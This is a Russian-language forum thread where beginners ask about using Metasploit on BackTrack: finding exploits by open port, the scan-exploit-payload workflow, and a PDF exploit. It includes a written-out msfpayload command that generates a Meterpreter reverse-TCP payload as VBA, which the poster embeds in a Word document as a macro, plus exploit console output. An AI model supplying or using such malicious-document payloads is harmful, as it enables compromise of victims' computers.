Доброго всем времени суток! В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой: никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения? Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает? З.Ы. в манах ничего не нашел =( И хотел бы уточнить, правильно ли я понимаю порядок действий? 1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий 2. находение сплоита отвечающего требованиям найденного, и конечной цели 3. использование сплоита с начинкой. Зарание спасибо.
Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон. Ну и автоподбор эксплойта рекомендую fast-track.
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается)) ????
Здравствуйте. у меня такая проблемка прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске" места на диске 30 гб подскажите в чем проблема? спасибо.
после запуска сплоита получаю вот такой ответ [*] Started reverse double handler [*] Sending Backdoor Command [-] Not backdoored [*] Exploit completed, but no session was created. это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?